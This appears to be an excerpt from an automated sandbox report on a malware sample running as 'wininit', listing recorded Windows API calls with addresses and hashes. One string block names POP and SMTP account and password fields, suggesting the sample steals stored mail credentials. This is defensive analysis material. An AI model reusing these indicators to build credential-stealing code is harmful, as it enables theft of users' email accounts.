                                                                                                                                • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                                                                                                                APIs
                                                                                                                                • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Open
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 71445658-0
                                                                                                                                • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                                                • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                                                                                                                • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                                                                                                                • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                                                • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                                                                                                                • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                                                                                                                • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                                                • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                                                                                                                • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                                                                                                                • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                                                                                                                APIs
                                                                                                                                • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseFind
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                                                • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                                                                                                                • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                                                                                                                • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                                                                                                                APIs
                                                                                                                                • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AttributesFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                                                • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                                                                                                                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                                                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                                                                                APIs
                                                                                                                                • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Close
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3535843008-0
                                                                                                                                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                                                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                                                                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                                                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                                                                APIs
                                                                                                                                • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ExistsFilePath
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1174141254-0
                                                                                                                                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                                                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                                                                                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                                                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                                                                                APIs
                                                                                                                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: recv
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1507349165-0
                                                                                                                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                                                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                                                                                                APIs
                                                                                                                                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: closesocket
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2781271927-0
                                                                                                                                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                                                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                                                                                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                                                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                                                                                APIs
                                                                                                                                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1263568516-0
                                                                                                                                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                                                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                                                                                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                                                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                                                                                APIs
                                                                                                                                • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                                                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                                                                                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                                                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                                                                                APIs
                                                                                                                                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: Sleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                                                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                                                                                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                                                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                                                                                APIs
                                                                                                                                • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                                                                • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                                                                                                                • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                                                                                                                • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                                                                                                                APIs
                                                                                                                                • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                                                                • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                                                                                                                • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                                                                                                                • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                                                                                                                APIs
                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                                                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                                                                • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1312198159-0
                                                                                                                                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                                                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                                                                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                                                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                                                                • API String ID: 0-2111798378
                                                                                                                                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                                                                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                                                                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                                                                                                                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000009.00000002.2881298963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_9_2_400000_wininit.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                                                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                                                                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                                                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64